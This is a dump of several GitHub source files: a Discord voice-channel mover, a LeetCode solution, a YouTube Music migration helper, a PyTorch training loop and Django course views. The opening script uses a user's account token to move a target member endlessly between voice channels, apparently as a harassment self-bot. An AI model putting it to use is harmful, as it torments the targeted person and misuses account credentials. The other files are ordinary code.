json\r\n\r\nf = open('config.json', 'r')\r\ndata = json.load(f)\r\n\r\nUSERID = data['UserID']\r\nSERVERID = data['ServerID']\r\nCHANNELID = data['ChannelID']\r\nCHANNELID1 = data['ChannelID1']\r\nCHANNELID2 = data['ChannelID2']\r\nCHANNELID3 = data['ChannelID3']\r\nCHANNELID4 = data['ChannelID4']\r\nCHANNELID5 = data['ChannelID5']\r\nTOKEN = data['token']\r\n\r\nchannel = [CHANNELID, CHANNELID1, CHANNELID2, CHANNELID3, CHANNELID4, CHANNELID5]\r\ncount = 0\r\nwhile True:\r\n for channelid in channel:\r\n if count == 10:\r\n time.sleep(10)\r\n\r\n moove = requests.patch(f'https://discord.com/api/v9/guilds/{SERVERID}/members/{USERID}', json={\"channel_id\": f\"{channelid}\"}, headers={\"authorization\": TOKEN, \"accept-encoding\": \"gzip, deflate, br\", \"content-type\": \"application/json\", \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/1.0.9003 Chrome/91.0.4472.164 Electron/13.4.0 Safari/537.36\"})\r\n if moove.status_code == 200:\r\n print(\"User Mooved With Succes\")\r\n count += 1\r\n else:\r\n print(moove.text)\r\n print(\"CANT MOOVE FUCKING USER\")\r\n","repo_name":"HumanQueen/Auto-moov-discord","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39458354630","text":"# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n#\n#\n# @param head ListNode类\n# @return ListNode类\n#\nclass Solution:\n def deleteDuplicates(self , head ):\n # write code here\n # 需要用一个头发结点\n # 因为头节点可能和下一个结点相等\n res=ListNode(0)\n res.next=head\n prev=res\n curr=head\n while curr and curr.next:\n # 当前和下一个不等\n # 因为是有序链表,所以可以认为curr只出现一次\n if curr.val!=curr.next.val:\n prev=curr\n curr=curr.next\n else:\n # 否则的话需要一次遍历,直到下一个不等\n # 把这中间的结点删除(跳过)\n while curr.val==curr.next.val:\n curr=curr.next\n if not curr.next:\n break\n prev.next=curr.next\n curr=curr.next\n return res.next\n","repo_name":"imlauzh/LeetCode","sub_path":"NowCoder/NC24 删除有序链表中重复的元素-II.py","file_name":"NC24 删除有序链表中重复的元素-II.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"21239945027","text":"from difflib import SequenceMatcher\nfrom re import compile, sub\nfrom typing import List, Optional\n\nfrom ytmusicapi import YTMusic\n\nytmusic = YTMusic(\"youtube_music/headers_auth.json\")\n\n\ndef get_string_similarity(a: str, b: str) -> float:\n return SequenceMatcher(a=a, b=b).ratio()\n\n\ndef delete_ytmusic_paylists():\n print(\"\\033[1;36mDeleting all playlists \\033[0m\")\n playlists = ytmusic.get_library_playlists(50) # TODO: Make this dynamic\n for playlist in playlists:\n ytmusic.delete_playlist(playlist.get(\"playlistId\"))\n print(f\"\\033[1;36m{playlist.get('title')} deleted\\033[0m\")\n\n\ndef clean_ytmusic_library():\n print(\"\\033[1;36mCleaning existing library \\033[0m\")\n library = ytmusic.get_library_songs(limit=3000) # TODO: Make this dynamic\n remove_tokens = [song.get(\"feedbackTokens\", []).get(\"remove\") for song in library]\n song_titles = [song.get(\"title\", \"\") for song in library]\n\n song_ptr = 0\n total_songs = len(remove_tokens)\n while song_ptr < total_songs:\n token = remove_tokens[song_ptr]\n\n remove_response = ytmusic.edit_song_library_status(feedbackTokens=token)\n is_processed = remove_response[\"feedbackResponses\"][0][\"isProcessed\"]\n print(f\"{int((song_ptr+1) * 100 / total_songs)}% - {song_titles[song_ptr]}\")\n if not is_processed:\n print(\"Error!\")\n else:\n song_ptr += 1\n\n\ndef get_matchting_song_by_time(yt_list_data: List[dict], spotify_data: dict):\n highest_avg = 0\n selected_song = None\n ERROR_RANGE = 2\n TITLE_CONSTANT = 1.3\n\n for yt_data in yt_list_data:\n if not (\n spotify_data[\"duration\"] - ERROR_RANGE\n <= yt_data[\"duration\"]\n <= spotify_data[\"duration\"] + ERROR_RANGE\n ):\n continue\n\n title_similarity = get_string_similarity(\n yt_data[\"title\"], spotify_data[\"title\"]\n )\n\n artist_similarity = get_string_similarity(\n yt_data[\"artists\"], spotify_data[\"artists\"]\n )\n\n album_similarity = get_string_similarity(\n yt_data[\"album\"], spotify_data[\"album\"]\n )\n\n avg = (\n (title_similarity * TITLE_CONSTANT) + artist_similarity + album_similarity\n ) / 3\n\n if avg > highest_avg and artist_similarity > 0.40 and title_similarity > 0.50:\n highest_avg = avg\n selected_song = yt_data\n\n return selected_song if highest_avg > 0.50 else None\n\n\ndef get_matching_song(\n yt_list_data: List[dict], spotify_data: dict, strict: bool\n) -> Optional[dict]:\n if strict:\n title_ratio = 0.50\n artist_ratio = 0.55\n album_ratio = 0.75\n title_album_ratio = 0.90\n else:\n title_ratio = 0.30\n artist_ratio = 0.50\n album_ratio = 0.75\n title_album_ratio = 0.50\n\n selected_song = None\n\n for yt_data in yt_list_data:\n title_similarity = get_string_similarity(\n yt_data[\"title\"], spotify_data[\"title\"]\n )\n\n if title_similarity < title_ratio:\n continue\n\n artist_similarity = get_string_similarity(\n yt_data[\"artists\"], spotify_data[\"artists\"]\n )\n\n if artist_similarity < artist_ratio:\n continue\n\n album_similarity = get_string_similarity(\n yt_data[\"album\"], spotify_data[\"album\"]\n )\n\n if album_similarity < album_ratio:\n yt_title_similar = selected_song and (\n get_string_similarity(selected_song[\"title\"], spotify_data[\"title\"])\n <= title_similarity\n ) # look for a more similar title\n if title_similarity >= title_album_ratio and (\n yt_title_similar or not selected_song\n ):\n prev_selected_song_album_similar = selected_song and (\n get_string_similarity(selected_song[\"album\"], spotify_data[\"album\"])\n > +album_similarity\n )\n selected_song = (\n selected_song if prev_selected_song_album_similar else yt_data\n )\n\n continue\n\n selected_song = (\n selected_song\n if selected_song\n and get_string_similarity(selected_song[\"title\"], spotify_data[\"title\"])\n >= title_similarity\n else yt_data\n )\n break\n\n return selected_song\n\n\ndef clean_title(title: str) -> str:\n title = title.lower()\n\n title = sub(\";[^;\\r\\n]+(?=(original|remaster|bonus|feat|with\\s)).*\", \"\", title)\n title = sub(\n \".([\\[\\(])[^\\)\\]]+(?=(riginal|emaster|onus|eat\\.|ith\\s|ingle|rom\\s)).*?([\\)\\]])\",\n \"\",\n title,\n )\n title = sub(\n \"-[^-\\r\\n]+(?=(original|remaster|bonus|feat|with\\s|single|from)).*\", \"\", title\n )\n title = sub(\".feat.*\", \"\", title)\n return title.strip()\n\n\ndef clean_artists(artist: str) -> str:\n artist = artist.lower()\n artist = sub(\",|\\ ?&\", \"\", artist)\n return artist.strip()\n\n\ndef clean_album(album: str) -> str:\n album = album.lower()\n album = sub(\".([\\[\\(])[^\\)\\]]+(?=(emaster)).*?([\\)\\]])\", \"\", album)\n album_regex = compile(\"[^A-Za-zÁÉÍÓÚáéíóúñÑ0-9 ]\")\n album = album_regex.sub(\"\", album)\n return album.strip()\n\n\ndef search_song(\n title: str, artists: List[str], album: str, duration: int, with_album: bool\n) -> Optional[dict]:\n title = clean_title(title)\n\n album = clean_album(album)\n album_first_word = album.split()[0] if album.split() else \"\"\n\n complete_artists = \", \".join(artists)\n\n search_query = (\n f\"{title} {complete_artists} {album_first_word if with_album else ''}\".strip()\n )\n search_result = ytmusic.search(query=search_query or \" \", filter=\"songs\")\n\n spotify_data = dict(\n title=title,\n artists=clean_artists(complete_artists),\n album=album.lower(),\n duration=duration,\n )\n yt_list_data = []\n\n for song_data in search_result:\n try:\n yt_artist = [\n artist.get(\"name\", \"\") for artist in song_data.get(\"artists\", [])\n ]\n yt_list_data.append(\n dict(\n title=clean_title(song_data[\"title\"]),\n artists=clean_artists(\", \".join(yt_artist)),\n album=clean_album(\n (song_data.get(\"album\", {}) or {}).get(\"name\", \"\")\n ),\n tokens=song_data.get(\"feedbackTokens\", {}),\n duration=song_data[\"duration_seconds\"],\n videoId=song_data[\"videoId\"],\n )\n )\n except AttributeError:\n print(song_data)\n return\n\n selected_song = get_matchting_song_by_time(yt_list_data, spotify_data)\n if not selected_song:\n selected_song = get_matching_song(yt_list_data, spotify_data, True)\n\n if not selected_song:\n spotify_data[\"artists\"] = clean_artists(artists[0])\n selected_song = get_matching_song(yt_list_data, spotify_data, False)\n\n return selected_song\n\n\ndef add_songs_to_library(token: str):\n is_processed = False\n while not is_processed:\n add_response = ytmusic.edit_song_library_status(feedbackTokens=token)\n is_processed = add_response[\"feedbackResponses\"][0][\"isProcessed\"]\n\n\ndef add_songs_to_playlist(playlist_id: str, videoId: str):\n ytmusic.add_playlist_items(playlist_id, [videoId])\n\n\ndef create_yt_playlist(name: str, description: str):\n return ytmusic.create_playlist(name, description)\n","repo_name":"PabloSanchez95/MusicMigrate","sub_path":"youtube_music/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40621828115","text":"# Refactoring of training loop\n# (support functions for training loop)\n\n# %%\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport pandas as pd\nimport numpy as np\n\nfrom pdb import set_trace\n\nRANDOM_SEED=42\nnp.random.seed(RANDOM_SEED)\ntorch.manual_seed(RANDOM_SEED)\n\n# %%\ndef compute_output_and_loss(model, data, target, loss_fn, survival=False):\n if survival==True:\n assert(target.shape[1]==2)\n output=model(data)\n # set_trace()\n loss=loss_fn(output, target)\n if survival==True:\n print(\"Add L1 Loss: Not implemented here yet\")\n return output, loss\n\n# %% \ndef forward_by_fp16(model, data, target, loss_fn, survival, fp16):\n if fp16==True:\n with torch.cuda.amp.autocast():\n output, loss=compute_output_and_loss(model=model,\n data=data, \n target=target, \n loss_fn=loss_fn, \n survival=survival)\n else:\n output, loss=compute_output_and_loss(model=model,\n data=data, \n target=target, \n loss_fn=loss_fn, \n survival=survival)\n return output, loss\n\n# %%\ndef on_forward(model, data, target, loss_fn=None, survival=False, bce_use=False, class_weights=None, train=True, fp16=False):\n if survival==False:\n if bce_use==True:\n loss_fn=torch.nn.BCEWithLogitsLoss()\n else:\n if loss_fn is None:\n loss_fn=torch.nn.CrossEntropyLoss(weight=class_weights \\\n if class_weights is not None else None)\n else:\n print(\"Survival Loss Not implemented here yet\")\n if survival==True:\n assert(target.shape[1]==2)\n assert(bce_use==False)\n if train==True:\n output, loss = forward_by_fp16(model=model,\n data=data,\n target=target,\n loss_fn=loss_fn,\n survival=survival,\n fp16=fp16)\n \n else:\n with torch.no_grad():\n output, loss = forward_by_fp16(model=model,\n data=data,\n target=target,\n loss_fn=loss_fn,\n survival=survival,\n fp16=fp16)\n return output, loss\n\n# %%\ndef on_backward(loss, optimizer, batch, batches, scheduler, fp16, scaler, backward_every=1):\n if fp16==True:\n assert(scaler is not None)\n if fp16==False:\n loss.backward()\n else:\n scaler.scale(loss).backward()\n \n if ((batch+1) % backward_every ==0) or (batch==(batches-1)):\n if fp16==False:\n optimizer.step()\n else:\n scaler.step(optimizer)\n scaler.update()\n if scheduler is not None:\n scheduler.step()\n optimizer.zero_grad()\n return\n\n# %%\ndef prepare_data_label_for_forward(data, target, device, bce_use, survival=False):\n if survival==True:\n assert(target.shape[1]==2)\n if bce_use==True:\n target=target.to(torch.float)\n else:\n target=target.squeeze(-1)\n data, target = data.to(device), target.to(device)\n return data, target\n\n# %%\ndef compute_pred_from_output(output):\n pred=torch.argmax(output, dim=1)\n return pred\n\n# %%\ndef prepare_pred_label_for_metric(output, target, bce_use, survival=False):\n if survival==True:\n assert(target.shape[1]==2)\n print(\"Prediction for survival not implemented here yet\")\n else:\n if bce_use==True:\n target_for_metric=target.to(torch.long)\n pred_for_metric=nn.Sigmoid()(output)\n else:\n target_for_metric=target\n pred_for_metric=compute_pred_from_output(output)\n return pred_for_metric, target_for_metric\n# %%\ndef on_one_epoch(epoch, data_loader, model, device, num_classes, bce_use, \n learning_rate, optimizer, metric_used, \\\n loss_fn=None,\n class_weights=None, scheduler=None, \n lr_adjuster_on_val=None, lr_div_factor=None, \\\n survival=False, one_cycle_epochs=None, \\\n metric_from_whole=True, \\\n train=False, inference_on_holdout=False,\n scaler=None, backward_every=1, fp16=False):\n loss_list=[]\n metric_list=[]\n shape_log_list=[1,1] if bce_use==True else [1]\n pred_list=torch.empty(shape_log_list)\n target_list=torch.empty(shape_log_list)\n # if bce_use==True:\n target_list=target_list.to(torch.long)\n if train==True:\n model.train()\n optimizer.zero_grad()\n else:\n model.eval()\n if (one_cycle_epochs is not None) and ((epoch+1) % one_cycle_epochs==0) and (train==True):\n scheduler=torch.optim.lr_scheduler.OneCycleLR(optimizer=optimizer,\n max_lr=learning_rate,\n steps_per_epoch=len(data_loader) if backward_every==1 else int((len(data_loader)-1)/backward_every_n_epochs),\n div_factor=lr_div_factor,\n epochs=one_cycle_epochs if backward_every==1 else (one_cycle_epochs+1)*backward_every_n_epochs*2,\n verbose=False\n )\n for batch_idx, (data, target) in enumerate(data_loader):\n data, target=prepare_data_label_for_forward(data=data,\n target=target,\n device=device,\n bce_use=bce_use,\n survival=survival)\n output, loss=on_forward(model=model,\n data=data, \n target=target,\n loss_fn=loss_fn,\n survival=survival,\n bce_use=bce_use,\n class_weights=class_weights,\n train=train,\n fp16=fp16)\n if train==True:\n on_backward(loss=loss,\n optimizer=optimizer, \n batch=batch_idx, \n batches=len(data_loader),\n scheduler=scheduler, \n fp16=fp16, \n scaler=scaler, \n backward_every=backward_every)\n loss_list.append(loss.cpu().item())\n pred, target_metric=prepare_pred_label_for_metric(output=output,\n target=target, \n bce_use=bce_use,\n survival=survival)\n if num_classes==len(target_metric.unique()):\n metric_list.append(metric_used(pred, target_metric).cpu().item())\n if metric_from_whole==True:\n pred_list=torch.cat((pred_list, pred.cpu()), dim=0)\n target_list=torch.cat((target_list, target_metric.cpu()), dim=0)\n if metric_from_whole==True:\n metric_epoch=100*metric_used(pred_list[1:], target_list[1:])\n else:\n metric_epoch=100*sum(metric_list)/len(metric_list)\n loss_epoch=sum(loss_list)/len(loss_list)\n if train==False and inference_on_holdout==False:\n if lr_adjuster_on_val is not None:\n lr_adjuster_on_val.step(metric_epoch)\n \n return model, optimizer, scheduler, lr_adjuster_on_val, \\\n loss_epoch, metric_epoch, pred_list[1:], target_list[1:]\n\n# %%\ndef save_progress(epoch, save_every, model, optimizer, path_performance, path_performance_and_model,\n train_loss_list, train_metric_list, val_loss_list, val_metric_list):\n if ((epoch+1) % save_every==0.) and ((path_performance is not None) or (path_performance_and_model is not None)):\n if path_performance is not None:\n torch.save(\n {\n 'train_loss': train_loss_list,\n 'train_metric': train_metric_list,\n 'val_loss': val_loss_list,\n 'val_metric': val_metric_list\n },\n path_performance)\n if path_performance_and_model is not None:\n torch.save(\n {\n 'train_loss': train_loss_list,\n 'train_metric': train_metric_list,\n 'val_loss': val_loss_list,\n 'val_metric': val_metric_list,\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n },\n path_performance_and_model)\n\n# %%\ndef fit(epochs,\n train_loader, valid_loader, test_loader,\n model, device, num_classes, bce_use, \n learning_rate, optimizer, metric_used, \\\n loss_fn=None,\n class_weights=None, scheduler=None,\n lr_adjuster_on_val=None, lr_div_factor=None, \\\n survival=None, one_cycle_epochs=None, \\\n metric_from_whole=True, \\\n backward_every=1, fp16=False,\n save_every=None,\n path_performance=None,\n path_performance_and_model=None):\n\n if fp16==True:\n scaler=torch.cuda.amp.GradScaler()\n else:\n scaler=None\n\n model.to(device)\n\n train_loss_list=[]\n train_metric_list=[]\n val_loss_list=[]\n val_metric_list=[]\n\n for epoch in range(epochs):\n\n model, optimizer, scheduler, lr_adjuster_on_val, \\\n loss_epoch, metric_epoch, _, _ =on_one_epoch(\n epoch, train_loader, model, device, num_classes, bce_use, \n learning_rate, optimizer, metric_used, \\\n class_weights=class_weights,\n loss_fn=loss_fn,\n scheduler=scheduler, lr_adjuster_on_val=lr_adjuster_on_val,\n lr_div_factor=lr_div_factor, \\\n survival=survival, one_cycle_epochs=one_cycle_epochs, \\\n metric_from_whole=metric_from_whole, \\\n train=True, inference_on_holdout=False,\n scaler=scaler, backward_every=backward_every, fp16=fp16)\n train_loss_list.append(loss_epoch)\n train_metric_list.append(metric_epoch)\n\n model, optimizer, scheduler, lr_adjuster_on_val, \\\n loss_epoch, metric_epoch, _, _=on_one_epoch(\n epoch, valid_loader, model, device, num_classes, bce_use, \n learning_rate, optimizer, metric_used, \\\n class_weights=class_weights,\n loss_fn=loss_fn,\n scheduler=scheduler, lr_adjuster_on_val=lr_adjuster_on_val,\n lr_div_factor=lr_div_factor, \\\n survival=survival, one_cycle_epochs=one_cycle_epochs, \\\n metric_from_whole=metric_from_whole, \\\n train=False, inference_on_holdout=False,\n scaler=scaler, backward_every=backward_every, fp16=fp16)\n val_loss_list.append(loss_epoch)\n val_metric_list.append(metric_epoch)\n \n print(f\"Epoch {epoch+1}/{epochs}, AUC_train: {train_metric_list[-1]:.2f}, AUC_valid: {val_metric_list[-1]:.2f}\")\n \n if save_every is not None:\n # SAVING\n save_progress(epoch,\n save_every,\n model,\n optimizer,\n path_performance,\n path_performance_and_model,\n train_loss_list,\n train_metric_list,\n val_loss_list,\n val_metric_list)\n\n if test_loader is not None:\n test_loss_list=[]\n test_metric_list=[]\n model, optimizer, scheduler, lr_adjuster_on_val, \\\n loss_epoch, metric_epoch, pred_test_list, target_test_list=on_one_epoch(\n epoch, test_loader, model, device, num_classes, bce_use, \n learning_rate, optimizer, metric_used, \\\n class_weights=class_weights,\n loss_fn=loss_fn, \n scheduler=scheduler, lr_adjuster_on_val=lr_adjuster_on_val, \n lr_div_factor=lr_div_factor, \\\n survival=survival, one_cycle_epochs=one_cycle_epochs, \\\n metric_from_whole=metric_from_whole, \\\n train=False, inference_on_holdout=True,\n scaler=scaler, backward_every=backward_every, fp16=fp16)\n test_loss_list.append(loss_epoch)\n test_metric_list.append(metric_epoch)\n\n print(f\"AUC_test: {test_metric_list[-1]:.2f}\")\n return pred_test_list, target_test_list","repo_name":"pigknight/expresstrain","sub_path":"legacy/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":13308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9357413337","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport os\nimport re\nimport kss\nimport json\nimport logging\nimport torch\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader, random_split\nfrom transformers import BertTokenizer\n\n\"\"\"\nmax_len길이의 데이터 셋 생성\n\"\"\"\ndef make_data_upto_maxlen( tokenizer, max_len, path=\"../data/namuwiki.txt\"):\n split_data = path.split('.')\n split_data[-2]+= f'-{max_len}'\n return_file_path = '.'.join(split_data)\n logging.info('file name:'+return_file_path)\n\n return_file= open(return_file_path,'w',encoding='utf-8')\n docs = []\n doc = \"\"\n doc_len = 0\n\n num_lines = sum(1 for line in open(path, 'r',encoding='utf-8'))\n logging.info('file line number: '+str(num_lines))\n data_file = open(path, 'r')\n\n for line in tqdm(data_file,\n desc='namuwiki data maker',\n total=num_lines):\n line = line[:-1]\n line_len = len(tokenizer.encode(line))\n added_doc_len = doc_len +line_len\n if line ==\"\":\n return_file.write(doc + \"\\n\")\n doc = \"\"\n doc_len = 0\n elif doc_len = max_len and doc_len
    Return to main page.\")\n\n curuser_id = request.user.id\n isWatched = Progress.objects.raw('''SELECT * FROM main_progress as MP \n WHERE MP.lecture_no_id = %s AND MP.s_username_id = %s;'''\n , [lecture.lecture_no, curuser_id])\n print(isWatched)\n\n cno = course.cno\n lectures = Lecture.objects.raw('''SELECT * FROM courses_lecture as CL WHERE CL.cno_id = %s;''', [cno])\n isFinished = 0\n if (len(isWatched) == 0):\n cursor.execute('''INSERT INTO main_progress(lecture_no_id ,s_username_id) VALUES (%s, %s); ''',\n [lecture.lecture_no, curuser_id])\n prog = Progress.objects.raw('''SELECT MP.prog_id FROM main_progress as MP\n WHERE MP.s_username_id = %s AND \n MP.lecture_no_id IN ( SELECT lecture_no\n FROM courses_lecture \n WHERE cno_id = %s );'''\n , [curuser_id, cno])\n\n prog = Progress.objects.raw('''SELECT MP.prog_id FROM main_progress as MP\n WHERE MP.s_username_id = %s AND \n MP.lecture_no_id IN ( SELECT lecture_no\n FROM courses_lecture \n WHERE cno_id = %s );'''\n , [curuser_id, cno])\n if (len(prog) == len(lectures) and not isContributor and course.is_complete == 1):\n cursor.execute('''SELECT user_id FROM main_finishes WHERE cno_id = %s and user_id = %s;''',\n [cno, curuser_id])\n if not cursor.fetchone():\n cursor.execute('''INSERT INTO main_finishes(comment,cno_id,user_id,score) VALUES (%s,%s, %s,%s);''',\n [\"\", cno, curuser_id, 0])\n isFinished = 1\n\n lecandprog = [None] * len(lectures)\n for i in range(0, len(lectures)):\n isWatched = Progress.objects.raw('''SELECT * FROM main_progress as MP \n WHERE MP.lecture_no_id = %s AND MP.s_username_id = %s;'''\n , [lectures[i].lecture_no, curuser_id])\n\n if (len(isWatched) > 0):\n lecandprog[i] = (lectures[i], \"Watched\")\n else:\n lecandprog[i] = (lectures[i], \"Unwatched\")\n\n cursor.execute('''SELECT COUNT(MP.prog_id) FROM main_progress as MP\n WHERE MP.s_username_id = %s AND \n MP.lecture_no_id IN ( SELECT lecture_no\n FROM courses_lecture \n WHERE cno_id = %s );'''\n , [curuser_id, cno])\n cnt_prog = cursor.fetchone()\n\n if cnt_prog:\n cnt_prog = cnt_prog[0]\n\n cursor.execute('''SELECT COUNT(lecture_no) FROM courses_lecture as CL WHERE CL.cno_id = %s;''', [cno])\n cnt_lec = cursor.fetchone()\n\n if cnt_lec:\n cnt_lec = cnt_lec[0]\n\n if cnt_lec is None or cnt_lec == 0:\n avg_prog = 0\n else:\n avg_prog = int((cnt_prog / cnt_lec) * 100)\n\n announcements = Announcement.objects.raw('''SELECT * FROM main_announcement as MA,auth_user as U \n WHERE MA.cno_id = %s and MA.i_user_id = U.id;''', [cno])\n # announcements = Announcement.objects.filter(cno_id=course.cno)\n\n notes = Takes_note.objects.raw('''SELECT * FROM main_takes_note as MTN \n WHERE MTN.lecture_no_id = %s AND MTN.s_username_id = %s;''',\n [lecture.lecture_no, curuser_id])\n newNote = NewNoteForm()\n lecturecnt = len(lectures)\n\n questions = Post.objects.raw('''SELECT postno\n FROM main_post\n WHERE postno NOT IN (SELECT answer_no_id AS postno FROM main_quest_answ ) \n AND lecture_no_id = %s; ''', [lecture.lecture_no])\n\n cursor.execute('''SELECT postno,post,date,username,username_id\n FROM main_post, auth_user\n WHERE postno NOT IN (SELECT answer_no_id AS postno FROM main_quest_answ ) \n AND lecture_no_id = %s AND username_id = id; ''', [lecture.lecture_no])\n questions = cursor.fetchall()\n qanda = [None] * len(questions)\n\n answers = [None] * len(questions)\n for i in range(0, len(questions)):\n answers[i] = Quest_answ.objects.raw('''SELECT *\n FROM main_quest_answ, main_post\n WHERE question_no_id = %s AND answer_no_id = postno;''',\n [questions[i][0]])\n cursor.execute( '''SELECT postno,post,date,username,username_id\n FROM main_quest_answ, main_post,auth_user\n WHERE question_no_id = %s AND answer_no_id = postno AND username_id = id;''',\n [questions[i][0]] )\n answers[i] = cursor.fetchall()\n qanda[i] = (questions[i], answers[i])\n\n assignments = Assignment.objects.raw('''SELECT *\n FROM main_assignment\n WHERE lecture_no_id = %s;''', [lecture.lecture_no])\n\n\n cursor.execute('''SELECT count(assignmentno) \n FROM main_assignment,courses_lecture\n WHERE cno_id = %s AND lecture_no = lecture_no_id;''', [cno])\n assignmentcnt = cursor.fetchone()[0]\n #assignmentcnt = len(assignments)\n\n\n\n\n lecturemat = LectureMaterial.objects.raw('''SELECT *\n FROM courses_lecturematerial\n WHERE lecture_no_id = %s;''', [lecture.lecture_no])\n\n cursor.execute( '''SELECT count(lecture_no_id)\n FROM courses_lecturematerial, courses_lecture\n WHERE cno_id = %s AND lecture_no = lecture_no_id;''', [cno] )\n \n lecturematcnt = cursor.fetchone()[0]\n\n cursor.execute('''SELECT U.username \n FROM main_contributor AS MC,auth_user AS U\n WHERE MC.cno_id = %s AND MC.user_id = U.id;''', [course.cno])\n\n contributor_list = cursor.fetchall()\n contributors = [None] * len(contributor_list)\n for i in range(0, len(contributors)):\n contributors[i] = contributor_list[i][0]\n\n cursor.execute('''SELECT U.username \n FROM main_teaches AS MT,auth_user AS U\n WHERE MT.lecture_no_id = %s AND MT.user_id = U.id;''', [lecture.lecture_no])\n\n teaches_list = cursor.fetchall()\n teaches = [None] * len(teaches_list)\n for i in range(0, len(teaches)):\n teaches[i] = teaches_list[i][0]\n\n form_lecmat_assignment = CreateAssignmentAndLectureMaterialForm()\n\n cursor = connection.cursor()\n cursor.execute('select type '\n 'from user_types '\n 'where id = %s;', [request.user.id])\n\n row = cursor.fetchone()\n user_type = -1\n if row:\n user_type = row[0]\n\n form_teacher = AddTeacherForm()\n\n form_question = AskQuestion()\n\n add_announcement = AddAnnouncementForm()\n topic_list = Topic.objects.raw('select topicname from main_topic;')\n context = {\n 'curlecture': lecture,\n 'course': course,\n 'announcements': announcements,\n 'notes': notes,\n 'assignments': assignments,\n 'assignmentcnt': assignmentcnt,\n 'lecturemat': lecturemat,\n 'lecturematcnt': lecturematcnt,\n 'lecturecnt': lecturecnt,\n 'qanda': qanda,\n 'lecandprog': lecandprog,\n 'url': '/' + course_slug + '/' + lecture_slug,\n 'contributors': contributors,\n 'form_lecmat_assignment': form_lecmat_assignment,\n 'user_type': user_type,\n 'topic_list': topic_list,\n 'isFinished': isFinished,\n 'teaches': teaches,\n 'avg_prog': avg_prog,\n 'isContributor': isContributor and (course.is_complete == 0),\n 'owner_username': owner_username,\n 'warning_message': warning_message\n }\n cursor.close()\n\n return render(request, 'courses/lecture_detail.html', context)\n\n def post(self, request, course_slug, lecture_slug, *args, **kwargs):\n cursor = connection.cursor()\n\n form_lecmat = CreateAssignmentAndLectureMaterialForm(request.POST)\n\n cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n lecture_no_row = cursor.fetchone()\n cursor.close()\n if not lecture_no_row:\n warning_message = \"Error: There is no lecture with this name.\"\n return MainView.get(self, request, warning_message)\n\n lecture_no = lecture_no_row[0]\n cursor = connection.cursor()\n\n if form_lecmat.is_valid():\n pdf_url_assignment = form_lecmat.cleaned_data['pdf_url_assignment']\n pdf_url_lecmat = form_lecmat.cleaned_data['pdf_url_lecmat']\n print(\"Assignment URL: \", pdf_url_assignment)\n print(\"Lecmat URL: \", pdf_url_lecmat)\n\n if pdf_url_lecmat:\n cursor.execute('insert into courses_lecturematerial (material, lecture_no_id) values (%s, %s);',\n [pdf_url_lecmat, lecture_no])\n if pdf_url_assignment:\n cursor.execute('insert into main_assignment (assignment, lecture_no_id) values (%s, %s);',\n [pdf_url_assignment, lecture_no])\n\n form_teacher = AddTeacherForm(request.POST)\n if form_teacher.is_valid():\n t_username = form_teacher.cleaned_data['addteacher']\n print(\"t_username\", t_username)\n cursor.execute('SELECT id from auth_user,accounts_instructor where username = %s AND id = student_ptr_id',\n [t_username])\n t_id_list = cursor.fetchone()\n if not t_id_list:\n warning_message = \"There is no teacher with this username.\"\n return LectureView.get(self, request, course_slug, lecture_slug, warning_message)\n\n t_id = t_id_list[0]\n\n cursor.execute('''SELECT user_id from main_teaches WHERE lecture_no_id = %s and user_id = %s''',\n [lecture_no, t_id])\n if not cursor.fetchone():\n cursor.execute('INSERT INTO main_teaches(lecture_no_id,user_id) VALUES (%s,%s);', [lecture_no, t_id])\n\n form_note = NewNoteForm(request.POST)\n if form_note.is_valid():\n newnote = form_note.cleaned_data['note']\n cursor.execute('INSERT INTO main_takes_note(note,lecture_no_id, s_username_id ) VALUES(%s,%s,%s);',\n [newnote, lecture_no, request.user.id])\n\n form_question = AskQuestion(request.POST)\n if form_question.is_valid():\n question = form_question.cleaned_data['question']\n print(\"Question : \", question)\n cursor.execute(\n 'insert into main_post (post, date, lecture_no_id, username_id) values (%s, curdate(), %s, %s);',\n [question, lecture_no, request.user.id])\n\n course_queue = Course.objects.raw('''SELECT * FROM courses_course WHERE slug = %s;''', [course_slug])\n if len(course_queue) > 0:\n course = course_queue[0]\n\n add_announcement = AddAnnouncementForm(request.POST)\n if add_announcement.is_valid():\n newannouncement = add_announcement.cleaned_data['addannouncement']\n cursor.execute('''insert into main_announcement (ann_date, ann_text, cno_id,i_user_id)\n values (curdate(),%s, %s, %s);''',\n [newannouncement, course.cno, request.user.id])\n\n cursor.close()\n return HttpResponseRedirect(request.path)\n\n\nclass DeleteTeacherView(View):\n def post(self, request, course_slug, lecture_slug, t_username, *args, **kwarg):\n\n cursor = connection.cursor()\n\n cursor.execute('SELECT id FROM auth_user WHERE username = %s;', [t_username])\n t_id_list = cursor.fetchone()\n if (t_id_list == None):\n warning_message = \"Error: There is no teacher with this username\"\n return LectureView.get(self, request, course_slug, lecture_slug, warning_message)\n\n t_id = t_id_list[0];\n print(t_id)\n cursor.execute('select lecture_no from courses_lecture where lecture_slug = %s;', [lecture_slug])\n lecture_no_row = cursor.fetchone()\n if not lecture_no_row:\n warning_message = \"Error: There is no lecture with this name.\"\n return MainView.get(self, request, warning_message)\n\n lecture_no = lecture_no_row[0]\n\n cursor.execute('DELETE FROM main_teaches WHERE user_id = %s and lecture_no_id = %s;', [t_id, lecture_no])\n cursor.close()\n warning_message = \"Success: Teacher successfully deleted\"\n return LectureView.get(self, request, course_slug, 